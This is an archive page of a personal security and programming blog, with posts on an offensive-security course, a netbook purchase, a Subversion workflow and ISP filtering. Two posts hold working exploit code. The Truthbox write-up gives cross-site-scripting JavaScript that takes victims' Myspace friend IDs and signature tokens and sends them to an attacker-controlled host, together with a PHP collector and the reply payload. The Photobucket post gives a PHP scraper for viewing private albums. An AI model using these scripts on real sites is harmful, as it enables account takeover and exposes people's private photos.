Joey Adams Dot Net

Southern Fried Programming


Enrolled in Offensive-Security 101

I just enrolled in the Offensive-Security 101 course from the creators of Backtrack. The scope of the course is huge. They cover everything from learning about your tools in depth, network enumeration, all the way to vulnerability discovery, exploit development, and documentation.

The course gives you online videos, written documentation, along with access to a special lab where you can try out challenges in each section on live machines. Not for the faint-hearted, the certification exam at the end gives you 24 hours in a completely live, unfamiliar network, in which you are to complete a number of challenges they give you. I have talked to a few people who have completed the exam, and they said they finished in around 8 hours.

This is a very demanding course and exam; the exam seems comparable to the RHCE and CCIE exams, as they take place in a live environment and you have to prove your abilities instead of showing your skill at memorization.

I am extremely anxious to start the course material, and will have a better review once I complete the course.

Asus EEE 1000HA on its way!

With Christmas being tomorrow, I tried to sort out what I really could use. After all, this is the biggest excuse to buy something for yourself without looking wasteful. I honestly could not come up with anything that I really needed that would satisfy my technolust.

If you don’t know, I own a HP DV8000 laptop; it has a 1.8GHz Turion64, 1.4GB RAM, a massive 17″ display and some wifi goodies for pentesting. The problem is, after an unfortunate run-in with airport security, the LCD has been washing out and you have to get it tilted to the ‘sweet’ spot just to use the computer; otherwise the screen stays frozen.

While it ‘IS’ a laptop, the massive amount of real estate and the issues with the display do not make it very worthy for mobile computing. If I were to whip it out at a coffee shop or somewhere, it would just dominate whatever table or lap it is sitting on, leaving no room for coffee :( . It is also a pain when troubleshooting friends’ computers or just carrying it while trying to operate it at the same time.

So I decided to get one of these sweet little EEE netbooks that I hear about all the time. I really like how small they are, in a nostalgic “Hackers” movie kind of way. I settled on the 1000HA. If you don’t know, the ‘H’ stands for hard drive, as in a magnetic 160GB drive as opposed to the ~20GB solid state ones in other models. I really like my drive capacity, even though the newer SSDs are very worth it. The ‘A’ stands for ‘Atom’, as in the new Intel Atom processor. The Atom is a very tiny 45nm part running at 1.6GHz. The 1000HA also sports a 10″ display.

After the order, which was extremely cheap thanks to Amazon.com, along with the 2GB RAM upgrade, I almost regretted ordering it: I wanted a compact netbook, and the pictures I found made this one look very similar to shorter 15″ notebooks. There is a very small number of photos of this model, and it is very difficult to imagine it in your hands. After watching a few YouTube videos of others installing RAM modules and unboxing the 1000HA, I am pretty sure that I will be keeping it.

I am still unsure what I want to use with it. I want to dual-boot with Backtrack3, and then change up to 4 whenever it comes out, but as my primary OS on the computer, I have no idea what I want. I really would like Debian, but the DebianEEE group has no news of tests on the 1000HA, and the same goes for the EEEbuntu group, and I really don’t want Fedora. I may just keep the stock XP, tune it, install some emulators and such, and play a little FF7 on the go.

Once I get it, I’ll install the 2GB upgrade, and run BT3 off an SD card and do some tests. If it runs fast enough, then I won’t dual-boot, as BT4 is soon to come.

Well, whatever, this is an attempt at an article; I will do more in depth on Tuesday when it arrives.

What REALLY happens when you view a webpage

This post is something I thought of while listening to people talk and gripe about how long it takes to view websites and to surf the internet. The majority of people do not understand the inner workings of computer systems at very low levels; even I have a threshold of knowledge that I have to stop at, but I think it would be an interesting read for someone who wants to know what exactly happens when they hit ‘GO’ in their favorite browser (hopefully Firefox ;) ).

INTRO:

To start things off, let’s talk about what the internet consists of. Most everyone knows what a Browser is, they have heard of “Servers” before, and have seen a Modem or Router. Well, these objects provide the basis for connectivity; after all, the internet is nothing more than a great big network of computers.

Hacking Myspace’s Truthbox

I developed exploit code for Truthbox months ago, and am now releasing a writeup.

Myspace applications are stand-alone web applications hosted on arbitrary servers that use Myspace’s API to pass user information into their own programming logic. I have not explored the details of authorization and authentication for using the API, but I imagine it is similar to PayPal’s API, with a series of requests and responses using transactional IDs and pre-shared authentication keys, and hopefully also using referrer information to determine whether the packets were sent from a legitimate source. Even with these security measures, such mechanisms are always flawed.

Back to the subject: I first discovered that you can enter scripting in almost any form into Truthbox replies. You cannot do this with the initial comment itself, but in replies you can enter markup and script without it being filtered; in other words, XSS (cross-site scripting).

The next part was finding an association on the client side with your Myspace identity. As it turns out, and in particular as part of an even bigger hole, your friend ID is stored in links all over the place inside a GET variable called ‘fb_sig_user’. More on why later.

So we create a script that will parse the page and pick out this friend ID from the links on the page. Not all links on the page contain this variable, so you have to make your script work a little bit harder. After we extract the friend ID, we can store it and view it later, plugging it into a Myspace URL, giving you the identity of whoever left you a comment. One problem: replies are limited in length, but all you have to do is store your script somewhere on the web and, in your reply, call the external script.

Now why does it store your friend ID, anyway? Well, for identification. Since you are not operating on Myspace’s servers, but in an iframe pointing to an arbitrary script, it is exactly like visiting an entirely different website. The seamless communication happens on the backend between Myspace and this app server. So by supplying your friend ID in the URL of web requests, you are telling ‘TruthBox’ who you are. So what if we change our friend ID to someone else’s?

Well, as I found out by plugging in variable by variable, there is a check that Truthbox does to make sure you are ‘you’. There is a value, or a signature, associated with your Truthbox account. If you have their friend ID and their signature, you simply plug these into the URL and you can take control of their Truthbox account. Luckily, the signature is also stored in client-side URL values as ‘fb_sig’. So we tweak our script to pull this value out along with the friend ID and we should be good to go.

Here is, in layman’s terms, how it works.

Someone leaves you a nasty, or exciting :), comment. You reply to their comment with an external script. In my script, I added a function to include a comment to separate different Truthbox comments from each other. Whenever they view your reply, the script runs and extracts their friend ID and Truthbox signature, and stores this to view later, along with the comment in my script.

You view the results, and can click a link to view their myspace profile. Another link, when clicked, allows you to take control and look through their truthbox profile, seeing who all they have commented, and who has commented them.

This was simply fun, messing with the unknown, and nothing more. With this research I more than satisfied what I wanted to accomplish, and beyond the 2 days I was messing with it, I have not looked at the source of Truthbox pages since.

Below is some of the source code for the scripts I used.

The external script. (a.js)

function strpos(haystack, needle, offset) {
    // PHP-style strpos: returns false when the needle is absent
    var i = (haystack + '').indexOf(needle, offset);
    return i === -1 ? false : i;
}
function gets(str) {
    // everything after 'fb_sig%3D' (URL-encoded 'fb_sig=')
    var f = strpos(str, 'fb_sig%3D') + 9;
    return str.substr(f);
}
function getf(str) {
    // the value between 'fb_sig_user%3D' and the next '%26' (URL-encoded '&')
    var f = strpos(str, 'fb_sig_user') + 14;
    var s = strpos(str, '%26', f);
    var l = s - f;
    return str.substr(f, l);
}
function a(comment) {
    var i = 0;
    var f = 0;
    while (f != 1) {
        if (document.links[i].href.search('fb_sig_user') > 0) {
            window.location = "http://xxxx/cook.php?c=" + comment + "&u=" + getf(document.links[i].href) + "&s=" + gets(document.links[i].href);
            f = 1;
        } else {
            i++;
        }
    }
}

cook.php

<?php

@$u = $_GET['u'];
@$s = $_GET['s'];

$dir = 'results';

// append one entry per visitor to results.html
$h = fopen("./{$dir}/results.html", 'a+');
$text = '';
if (isset($_GET['c'])) {
    $text .= "Comment= {$_GET['c']} - ";
}
if (isset($_GET['s'])) {
    $text .= "<a href='http://opensocial.rockyou.com/google_apps/truthbox/truthbox/html/index.php?target=home&fb_sig_user={$u}&fb_sig_network=myspace&fb_sig={$s}'>See Their Truths</a> -";
}
$text .= "Profile: <a href='http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid={$u}'>View Profile</a><hr/>";
fwrite($h, $text);
fclose($h);

?>

The reply used to trigger the attack.

<script type='text/javascript' src='http://xxxx/a.js'></script>
<script>a('Comment Here');</script>

Lack of.. Posting

I have not posted in a good while because I have been too busy with things. With the economic meltdown, my day job is now doubled. I work at a local FOX affiliate, but I also contract IT work for them as well. Due to the current hiring freeze I can’t be promoted (not sure I would be in the first place), and to top all that off I also work with Heritage Web Solutions as an outsourced dev.

Between it all I make some good money but do not get a lot of free time, and the time I get is consumed with my son and my many hobbies.

What I want to accomplish before the new year is the Zend Framework Cert, and then complete the MySQL exam in the first quarter of next year. That should satisfy me for now.

There have been a great deal of happenings in the security world, the newest being the ever-elusive clickjacking. I’ve been keeping up with it by constantly reading RSnake’s blog over at http://ha.ckers.org. If you have not heard of it, then you MUST visit his blog to read more; I won’t even disrespect the subject by regurgitating what he said, you must read it for yourself.

SupermanDatHo ? Soulja Boy got hacked

Yes… That was his pw.

I’m not blogging on this much because all it was is someone guessing his password, which is quite hilarious though.

Anyway.. at the end of the video he posted, he calls out hackers, wanting to make an example of this one.. let’s just say it is not wise to mess with people who can take your life away in this digital age; just tell him to ask the owner of LifeLock how that works out for you.

Subversive Development for the Serious Web Professional

I won’t go into detail explaining version control, because there are countless articles and papers in the wild about it. I am, however, going to explain how I am implementing Subversion in my current development environment.

First, my reasons for using version control:

  • No SPOF (single point of failure) - My flow always has 3 concurrent copies of the source at any given point, so if one machine fails fatally, my project data is still safe.
  • Repository - Having a repository means I can revert to older versions if needed, as well as keep up with changes made each step along the way.
  • No direct editing - I never have to touch staging or live servers, I only modify the development copy, so that human error is reduced ten-fold.

Here is how it all works.

I have 3 machines, dev/repo/serv, where dev is my development workstation, repo is the machine hosting the Subversion repository, and serv is my http server.

On the http server, in my projects directory, there is a folder for each project I am working on. In the individual project folder, there are 3 other folders, dev/staging/live.

Using virtual hosts on httpserv, I make the development folder accessible only from my local network, the staging folder is available with password protection, and the live server is publicly available.

I use Zend Studio for Eclipse with a Subversion/PHP project and use WebDrive to securely map the project’s dev folder onto my local machine. I create/edit/modify project files from my workstation (which holds a cache of project files) in the dev folder on my http server.

I edit files from my workstation and view the changes on the development vhost. Once I finish adding a module/functionality/milestone on the project and want the client’s approval, I use a script called svn_sync.sh located in each project’s main directory.

svn_sync.sh first makes sure you have committed changes to the trunk, aka the dev folder; after that you specify what source you want to merge and update. Once I finish adding features, I merge the trunk into the staging branch and update the working copy inside the staging folder. I can now show the client the changes.

Once I have his approval, I run svn_sync.sh again and have it merge the staging branch into the live branch, and then update the live directory, aka the live server.

That is my SDLC (Software development life-cycle). Things are neat and tidy, and I only make changes to the trunk/development folder of the project.

This method is everything I could wish for: highly available, reliable, robust, scalable, and professional.

Sure, direct editing and copy -r work, and I may be overdoing it as a single developer, but I am very happy with my results and would recommend anyone wanting the experience to do the same.

Web Application Security Survey

It is unarguable that Jeremiah Grossman is a pretty big name in Web Application Security. I really enjoy reading his and Robert (aka Mr. XSS, RSnake) Hansen’s posts. They tend to have a lot of great info, and a lot of fun things to be a part of.

Jeremiah has his W.A.S. Survey up for anyone that works around the field to take. Some of the questions are really inquisitive.

Anyway, if you work around the field, you should take the survey. Head on over to his site to take it.

View private Photobucket accounts via Mobile-Web

Photobucket has done it again. It appears that using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.

I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend, Jessie McKnight. The catch was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links takes a lot of time.

I hacked up a working script in about an hour that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsulated in an image tag to an HTML file using the original Photobucket URL (not the mobile domain), then repeats this process on the URL obtained from the prev anchor.

This was a very intensive process, so I capped it at 50 requests, and storing the pictures on a separate page allowed for quicker retrievals while the script was crawling, and also for saving results from different people using the script at the same time.

This is in no way an optimized script; it was thrown together from scratch to completion in under an hour, but it is just a P.O.C.

<form method="GET" action=''>
URL TO VALID PICTURE: <input type='text' name='album'><br/>
<input type='submit'>
</form>

<?php

if (isset($_GET['album'])) {
    $fh = fopen('photos.html', 'a');
    $get_album = $_GET['album'];
    // the last path segment is the picture name; the rest is the album URL
    $picture = substr(substr($get_album, strrpos($get_album, '/')), 1);
    $albumurl = substr($get_album, 0, strrpos($get_album, '/'));
    $album = substr(substr($albumurl, strrpos($albumurl, '/')), 1);
    $url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
    $i = 0;
    while ($i <= 100) {
        $url = getPrevUrl($url);
        $im = getImage($url, $albumurl);
        fwrite($fh, $im);
        echo $im;
        $i++;
    }
    fclose($fh);
}

// fetch the mobile page and return the URL behind its "previous" link
function getPrevUrl($url) {
    $input = @file_get_contents($url) or die("Could not access file: $url");
    $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
    if (preg_match_all("/$regexp/siU", $input, $matches)) {
        // href of the fifth anchor on the page (index 4), where the prev link sat
        $photoUrl = "http://m55.photobucket.com" . $matches[2][4];
        return $photoUrl;
    } else {
        return $url;
    }
}

// rebuild the image URL on the main (non-mobile) domain and wrap it in an <img> tag
function getImage($url, $alburl) {
    $photoUrl = substr($url, 0, strrpos($url, "."));
    $photoUrl = substr($photoUrl, strrpos($photoUrl, "/"));
    $photoUrl = $alburl . $photoUrl;
    return "<img src='$photoUrl'/><br/>";
}
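The check the mobile domain was missing, as an added example that is not Photobucket’s code: one authorization rule that every photo view, and therefore its prev/next links, has to pass on the mobile path just as on the main site. Album data, user names and URL paths are constructed.

```javascript
// Added example (not Photobucket's code): one authorization rule that every
// photo view has to pass, so mobile prev/next navigation cannot leak the
// neighbouring photos of a private album. All data below is constructed.
const albums = {
  beachtrip: { owner: 'alice', isPrivate: true,
               photos: ['IMG_001.jpg', 'IMG_002.jpg', 'IMG_003.jpg'] },
  publicpics: { owner: 'bob', isPrivate: false, photos: ['a.jpg', 'b.jpg'] },
};

// Private albums are visible only to their owner; `viewer` is the
// authenticated user name, or null for an anonymous visitor.
function canView(viewer, album) {
  return !album.isPrivate || viewer === album.owner;
}

// Builds the mobile view for one photo: the image plus prev/next links.
// The access check runs before any link is computed, so a denied request
// gets null rather than a page whose neighbour links can be followed.
// Paths loosely follow the URL pattern in the post above (assumed).
function viewPhoto(viewer, albumName, photo) {
  const album = albums[albumName];
  if (!album || !canView(viewer, album)) return null;
  const i = album.photos.indexOf(photo);
  if (i === -1) return null;
  const link = (p) => (p === undefined ? null : `/albumview/albums/${albumName}/${p}.html`);
  return {
    image: `/albums/${albumName}/${photo}`,
    prev: link(album.photos[i - 1]),
    next: link(album.photos[i + 1]),
  };
}
```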

Major ISPs agree on child pornography filtering.

I have not gone into detail about this agreement, but you can be certain that whenever ISPs band together to prevent something, it hurts the consumer.

Filtering slows down speeds (minutely), but the real flaw in filtering is the use of an uncertain list. Whitelisting or blacklisting, there are ALWAYS false positives when you do not have an exact plain-text match.

I am definitely against child pornography; however, false positives from filtering, and the way some ISPs like to communicate with law enforcement, could cause a myriad of problems for everyday households. Prosecution should be done through cooperation with web hosting companies that are hosting accounts with this type of content on them. Filtering is not mature enough yet.

For instance, AT&T customers, this blog post even might be filtered away in the given year, just for its title.

Filtering, throttling, anything other than providing direct internet connectivity, is a horrible breach of trust and net neutrality. Boo!